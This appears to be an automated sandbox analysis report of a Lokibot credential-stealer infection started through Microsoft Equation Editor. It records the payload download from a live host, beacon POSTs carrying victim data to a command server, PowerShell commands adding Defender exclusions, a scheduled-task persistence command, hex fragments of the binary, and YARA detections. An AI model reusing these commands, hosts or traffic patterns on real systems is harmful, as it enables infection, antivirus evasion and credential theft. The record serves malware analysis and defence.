                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QfH%2F2BVpjSen2eyktv1BYCPUDFXtQxn3KpP4F9EwmF%2FpGNJP2lvbmrqIFTdvNpzHn%2FBGQTrQ%2B0xCYfbEmd%2BFuH1ZDtC6xk%2Ba1bxlgSfloXz3%2BWCmJCVyI5dcMleVAFZYoG19"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870da3a9d48c75-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      96192.168.2.2249260188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:16.882044077 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:16.932179928 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:17.508523941 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BFhwP2H%2BOS5aCEOLuYOThMMa498qI5eWf%2F2BIAL1yiv305Hw2OBPHrpxDwvW4BkBMFGYJ5FrrQU3pkrBQ%2FGu75qS0HnDCSqOaLgZlfCr5YxGUkSfVMA9mYI%2Fqq%2BFaN7NnmOR"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870da92fb77288-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      97192.168.2.2249261188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:17.653378963 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:17.709537983 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:18.284159899 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i1k06TqmMpfmAdQ55cmQPUDY0UHc8UvEa%2FqwjX4bImXFfZsrXLkcVsGptiCFg5xqG128v6YYH%2F7IUm5HHJiX3MDbv8QxFpcWAHiFmQEh%2BJlGNSxMcEZKxTaDeGCXTbK982PN"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870dadfe3641ed-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      98192.168.2.2249262188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:18.441020966 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:18.492275000 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.2249163104.21.74.1914432740C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:17:25 UTC318OUTGET /sharonzx.exe HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: universalmovies.top
                      Connection: Keep-Alive
                      2024-05-23 18:17:26 UTC845INHTTP/1.1 200 OK
                      Date: Thu, 23 May 2024 18:17:25 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 771592
                      Connection: close
                      Last-Modified: Thu, 23 May 2024 00:58:34 GMT
                      ETag: "664e94ba-bc608"
                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                      Cache-Control: max-age=315360000
                      CF-Cache-Status: HIT
                      Age: 39321
                      Accept-Ranges: bytes
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbcLgZPPlpfozJC4jbbX5D1ZA7QbeeetcLreAH7Ansre%2BwzPcbxOz2LXFVsOd8ew%2Bs9l718X2ERTcxLSPXBxJxechtooSCAao0MPwqv26X%2BDRx0PZK2Jks9C9qti0F05T4b3UjJe"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Strict-Transport-Security: max-age=0; includeSubDomains; preload
                      X-Content-Type-Options: nosniff
                      Server: cloudflare
                      CF-RAY: 88870af14f4f4345-EWR
                      alt-svc: h3=":443"; ma=86400
                      2024-05-23 18:17:26 UTC524INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 96 46 84 84 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 84 0b 00 00 0a 00 00 00 00 00 00 6e a2 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELF0n @ @
                      2024-05-23 18:17:26 UTC1369INData Raw: 02 00 05 00 c0 65 00 00 74 f4 04 00 03 00 00 00 1a 00 00 06 34 5a 05 00 f0 2b 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 4c 00 00 00 01 00 00 11 02 17 7d 02 00 00 04 02 28 1d 00 00 0a 00 00 02 28 1e 00 00 0a 00 02 28 10 00 00 06 00 02 fe 06 12 00 00 06 73 1f 00 00 0a 0a 02 28 20 00 00 0a 06 6f 21 00 00 0a 00 02 28 22 00 00 0a 06 6f 23 00 00 0a 00 02 28 24 00 00 0a 00 2a 13 30 04 00 89 01 00 00 02 00 00 11 02 17 7d 02 00 00 04 02 03 04 16 28 25 00 00 0a 00 00 02 03 04 28 26 00 00 0a 0c 08 2c 35 00 02 16 28 0f 00 00 06 00 02 fe 06 12 00 00 06 73 1f 00 00 0a 0d 02 28 06 00 00 06 09 6f 21 00 00 0a 00 02 28 07 00 00 06 09 6f 23 00 00 0a 00 38 35 01 00 00 03 72 01 00
                      Data Ascii: et4Z+0L}(((s( o!("o#($*0}(%(&,5(s(o!(o#85r
                      2024-05-23 18:17:26 UTC1369INData Raw: 00 00 0a 09 6f 4f 00 00 0a 26 07 08 6f 50 00 00 0a 00 06 6f 51 00 00 0a 13 04 02 11 04 6f 52 00 00 0a 6f 53 00 00 0a 13 05 11 05 39 11 01 00 00 00 73 43 00 00 0a 13 06 73 43 00 00 0a 13 07 00 14 13 08 11 04 11 06 6f 54 00 00 0a 00 02 11 04 6f 52 00 00 0a 6f 55 00 00 0a 6f 56 00 00 0a 13 09 38 9a 00 00 00 00 11 09 6f 57 00 00 0a 74 1f 00 00 01 13 08 11 07 16 6a 6f 58 00 00 0a 00 11 08 11 07 6f 54 00 00 0a 00 11 06 6f 59 00 00 0a 11 07 6f 59 00 00 0a fe 01 13 0a 11 0a 2c 60 00 11 06 16 6a 6f 46 00 00 0a 00 11 07 16 6a 6f 46 00 00 0a 00 2b 03 00 00 00 11 06 6f 5a 00 00 0a 11 06 6f 59 00 00 0a 2e 12 11 06 6f 5b 00 00 0a 11 07 6f 5b 00 00 0a fe 01 2b 01 16 13 0b 11 0b 2d d4 11 06 6f 5a 00 00 0a 11 06 6f 59 00 00 0a fe 01 13 0c 11 0c 2c 06 00 07 13 0d de 51 00
                      Data Ascii: oO&oPoQoRoS9sCsCoToRoUoV8oWtjoXoToYoY,`joFjoF+oZoY.o[o[+-oZoY,Q
                      2024-05-23 18:17:26 UTC1369INData Raw: 26 00 00 0a 0c 08 2c 35 00 02 16 28 29 00 00 06 00 02 fe 06 2c 00 00 06 73 1f 00 00 0a 0d 02 28 20 00 00 06 09 6f 21 00 00 0a 00 02 28 21 00 00 06 09 6f 23 00 00 0a 00 38 35 01 00 00 03 72 01 00 00 70 d0 53 00 00 01 28 27 00 00 0a 6f 28 00 00 0a 74 53 00 00 01 0a 02 03 04 28 29 00 00 0a 17 fe 01 13 04 11 04 39 c2 00 00 00 00 73 1d 00 00 0a 13 05 11 05 06 73 2a 00 00 0a 73 2b 00 00 0a 6f 2c 00 00 0a 00 11 05 6f 20 00 00 0a 72 15 00 00 70 6f 2d 00 00 0a 14 fe 03 13 06 11 06 2c 24 00 02 28 20 00 00 0a 11 05 6f 20 00 00 0a 72 15 00 00 70 6f 2d 00 00 0a 73 7d 00 00 06 6f 2e 00 00 0a 00 00 02 11 05 6f 2f 00 00 0a 28 30 00 00 0a 00 02 11 05 6f 31 00 00 0a 28 32 00 00 0a 00 02 11 05 6f 33 00 00 0a 28 34 00 00 0a 00 02 11 05 6f 35 00 00 0a 28 36 00 00 0a 00 02 11
                      Data Ascii: &,5(),s( o!(!o#85rpS('o(tS()9ss*s+o,o rpo-,$( o rpo-s}o.o/(0o1(2o3(4o5(6
                      2024-05-23 18:17:26 UTC1369INData Raw: 00 0a 11 06 6f 59 00 00 0a 2e 12 11 06 6f 5b 00 00 0a 11 07 6f 5b 00 00 0a fe 01 2b 01 16 13 0b 11 0b 2d d4 11 06 6f 5a 00 00 0a 11 06 6f 59 00 00 0a fe 01 13 0c 11 0c 2c 06 00 07 13 0d de 51 00 00 11 09 6f 5c 00 00 0a 13 0e 11 0e 3a 56 ff ff ff 00 de 2d 00 11 06 14 fe 03 13 0f 11 0f 2c 0a 00 11 06 6f 5d 00 00 0a 00 00 11 07 14 fe 03 13 10 11 10 2c 0a 00 11 07 6f 5d 00 00 0a 00 00 00 dc 00 02 11 04 6f 5e 00 00 0a 26 07 13 0d 2b 00 11 0d 2a 00 01 10 00 00 02 00 68 00 d4 3c 01 2d 00 00 00 00 26 02 28 90 00 00 0a 00 00 2a 00 00 13 30 02 00 39 00 00 00 13 00 00 11 00 7e 0a 00 00 04 14 fe 01 0a 06 2c 22 00 72 f0 9c 04 70 d0 06 00 00 02 28 27 00 00 0a 6f 91 00 00 0a 73 92 00 00 0a 0b 07 80 0a 00 00 04 00 7e 0a 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00
                      Data Ascii: oY.o[o[+-oZoY,Qo\:V-,o],o]o^&+*h<-&(*09~,"rp('os~+*0
                      2024-05-23 18:17:26 UTC1369INData Raw: 1e 00 00 04 02 7b 0e 00 00 04 6f b2 00 00 0a 00 02 7b 17 00 00 04 6f b2 00 00 0a 00 02 7b 1e 00 00 04 6f b2 00 00 0a 00 02 28 6b 00 00 0a 00 02 7b 0e 00 00 04 28 b3 00 00 0a 6f 6d 00 00 0a 00 02 7b 0e 00 00 04 16 16 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 0e 00 00 04 72 02 9e 04 70 6f 70 00 00 0a 00 02 7b 0e 00 00 04 20 05 02 00 00 20 fe 01 00 00 73 71 00 00 0a 6f 72 00 00 0a 00 02 7b 0e 00 00 04 17 6f b4 00 00 0a 00 02 7b 0e 00 00 04 16 6f b5 00 00 0a 00 02 7b 0e 00 00 04 16 6f b6 00 00 0a 00 02 7b 0f 00 00 04 72 1a 9e 04 70 22 00 00 40 41 17 73 b7 00 00 0a 6f b8 00 00 0a 00 02 7b 0f 00 00 04 28 b9 00 00 0a 6f 9b 00 00 0a 00 02 7b 0f 00 00 04 20 2e 02 00 00 1f 37 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 0f 00 00 04 72 4a 9d 04 70 6f 70 00 00 0a 00 02 7b 0f
                      Data Ascii: {o{o{o(k{(om{snoo{rpop{ sqor{o{o{o{rp"@Aso{(o{ .7snoo{rJpop{
                      2024-05-23 18:17:26 UTC1369INData Raw: 17 6f bd 00 00 0a 00 02 7b 16 00 00 04 72 1a 9e 04 70 22 00 00 40 41 17 73 b7 00 00 0a 6f b8 00 00 0a 00 02 7b 16 00 00 04 20 97 02 00 00 20 c6 01 00 00 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 16 00 00 04 72 54 9f 04 70 6f 70 00 00 0a 00 02 7b 16 00 00 04 20 ab 00 00 00 1f 2b 73 71 00 00 0a 6f 72 00 00 0a 00 02 7b 16 00 00 04 1e 6f 73 00 00 0a 00 02 7b 16 00 00 04 72 64 9f 04 70 6f 87 00 00 0a 00 02 7b 16 00 00 04 16 6f be 00 00 0a 00 02 7b 16 00 00 04 02 fe 06 38 00 00 06 73 76 00 00 0a 6f bf 00 00 0a 00 02 7b 17 00 00 04 28 bb 00 00 0a 6f bc 00 00 0a 00 02 7b 17 00 00 04 20 c3 03 00 00 1f 0c 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 17 00 00 04 72 6e 9f 04 70 6f 70 00 00 0a 00 02 7b 17 00 00 04 1f 1e 1f 1c 73 71 00 00 0a 6f 72 00 00 0a 00 02 7b 17 00 00 04
                      Data Ascii: o{rp"@Aso{ snoo{rTpop{ +sqor{os{rdpo{o{8svo{(o{ snoo{rnpop{sqor{
                      2024-05-23 18:17:26 UTC1369INData Raw: 20 00 01 00 00 14 73 c8 00 00 0a a2 6f c7 00 00 0a 00 02 7b 1d 00 00 04 02 7b 1c 00 00 04 6f ca 00 00 0a 00 02 7b 1d 00 00 04 02 7b 1a 00 00 04 6f cb 00 00 0a 00 02 7b 1d 00 00 04 02 7b 18 00 00 04 6f cc 00 00 0a 00 02 7b 1d 00 00 04 6f cd 00 00 0a 17 8d 92 00 00 01 25 16 72 45 a3 04 70 72 15 00 00 70 1d 8d 93 00 00 01 25 16 72 68 9d 04 70 72 68 9d 04 70 73 ce 00 00 0a a2 25 17 72 7c 9d 04 70 72 7c 9d 04 70 73 ce 00 00 0a a2 25 18 72 90 9d 04 70 72 90 9d 04 70 73 ce 00 00 0a a2 25 19 72 a2 9d 04 70 72 a2 9d 04 70 73 ce 00 00 0a a2 25 1a 72 5c 9d 04 70 72 5c 9d 04 70 73 ce 00 00 0a a2 25 1b 72 4a 9d 04 70 72 4a 9d 04 70 73 ce 00 00 0a a2 25 1c 72 bc 9d 04 70 72 bc 9d 04 70 73 ce 00 00 0a a2 73 cf 00 00 0a a2 6f d0 00 00 0a 00 02 7b 1d 00 00 04 02 7b 1b 00
                      Data Ascii: so{{o{{o{{o{o%rEprp%rhprhps%r|pr|ps%rprps%rprps%r\pr\ps%rJprJps%rprpsso{{
                      2024-05-23 18:17:26 UTC1369INData Raw: 00 00 0a 00 02 7b 21 00 00 04 20 2e 02 00 00 20 99 00 00 00 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 21 00 00 04 72 bb a3 04 70 6f 70 00 00 0a 00 02 7b 21 00 00 04 20 8c 01 00 00 1f 1e 73 71 00 00 0a 6f 72 00 00 0a 00 02 7b 21 00 00 04 17 6f 73 00 00 0a 00 02 7b 21 00 00 04 72 cd a3 04 70 6f 87 00 00 0a 00 02 7b 21 00 00 04 02 fe 06 40 00 00 06 73 76 00 00 0a 6f ba 00 00 0a 00 02 7b 22 00 00 04 72 1a 9e 04 70 22 00 00 40 41 17 19 16 73 d4 00 00 0a 6f b8 00 00 0a 00 02 7b 22 00 00 04 28 d5 00 00 0a 6f 9b 00 00 0a 00 02 7b 22 00 00 04 20 2e 02 00 00 20 0f 01 00 00 73 6e 00 00 0a 6f 6f 00 00 0a 00 02 7b 22 00 00 04 72 e9 a3 04 70 6f 70 00 00 0a 00 02 7b 22 00 00 04 20 8c 01 00 00 1f 1e 73 71 00 00 0a 6f 72 00 00 0a 00 02 7b 22 00 00 04 18 6f 73 00 00 0a 00 02
                      Data Ascii: {! . snoo{!rpop{! sqor{!os{!rpo{!@svo{"rp"@Aso{"(o{" . snoo{"rpop{" sqor{"os
                      2024-05-23 18:17:26 UTC1369INData Raw: 04 70 1e 16 17 16 16 16 72 68 9d 04 70 20 00 01 00 00 14 73 c8 00 00 0a a2 6f c7 00 00 0a 00 02 7b 2a 00 00 04 02 7b 29 00 00 04 6f ca 00 00 0a 00 02 7b 2a 00 00 04 02 7b 26 00 00 04 6f cc 00 00 0a 00 02 7b 2a 00 00 04 6f cd 00 00 0a 17 8d 92 00 00 01 25 16 72 45 a3 04 70 72 15 00 00 70 19 8d 93 00 00 01 25 16 72 4a 9d 04 70 72 4a 9d 04 70 73 ce 00 00 0a a2 25 17 72 bc 9d 04 70 72 bc 9d 04 70 73 ce 00 00 0a a2 25 18 72 68 9d 04 70 72 68 9d 04 70 73 ce 00 00 0a a2 73 cf 00 00 0a a2 6f d0 00 00 0a 00 02 7b 2a 00 00 04 02 7b 28 00 00 04 6f d1 00 00 0a 00 02 7b 27 00 00 04 72 49 a0 04 70 6f c2 00 00 0a 00 02 7b 27 00 00 04 16 6f c3 00 00 0a 00 02 7b 2b 00 00 04 72 25 00 00 70 6f 30 00 00 0a 00 02 7b 2b 00 00 04 17 6f 3f 00 00 0a 00 02 22 00 00 00 41 22 00 00
                      Data Ascii: prhp so{*{)o{*{&o{*o%rEprp%rJprJps%rprps%rhprhpsso{*{(o{'rIpo{'o{+r%po0{+o?"A"


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:14:17:21
                      Start date:23/05/2024
                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                      Imagebase:0x13f6c0000
                      File size:1'423'704 bytes
                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:2
                      Start time:14:17:22
                      Start date:23/05/2024
                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Imagebase:0x400000
                      File size:543'304 bytes
                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:5
                      Start time:14:17:26
                      Start date:23/05/2024
                      Path:C:\Users\user\AppData\Roaming\sharon38892.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\sharon38892.exe"
                      Imagebase:0x860000
                      File size:771'592 bytes
                      MD5 hash:0B67ADEB422396C047E87FA78A9E8E80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 42%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:6
                      Start time:14:17:29
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe"
                      Imagebase:0xdd0000
                      File size:427'008 bytes
                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:8
                      Start time:14:17:29
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe"
                      Imagebase:0xdd0000
                      File size:427'008 bytes
                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      Target ID:9
                      Start time:14:17:29
                      Start date:23/05/2024
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp"
                      Imagebase:0xc90000
                      File size:179'712 bytes
                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:12
                      Start time:14:17:31
                      Start date:23/05/2024
                      Path:C:\Users\user\AppData\Roaming\sharon38892.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Roaming\sharon38892.exe"
                      Imagebase:0x860000
                      File size:771'592 bytes
                      MD5 hash:0B67ADEB422396C047E87FA78A9E8E80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000C.00000002.618205629.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Target ID:13
                      Start time:14:17:32
                      Start date:23/05/2024
                      Path:C:\Windows\System32\taskeng.exe
                      Wow64 process (32bit):false
                      Commandline:taskeng.exe {E2BA91ED-D885-4B20-9033-3784D17E4A5D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                      Imagebase:0xff6a0000
                      File size:464'384 bytes
                      MD5 hash:65EA57712340C09B1B0C427B4848AE05
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:14
                      Start time:14:17:33
                      Start date:23/05/2024
                      Path:C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe
                      Imagebase:0x180000
                      File size:771'592 bytes
                      MD5 hash:0B67ADEB422396C047E87FA78A9E8E80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
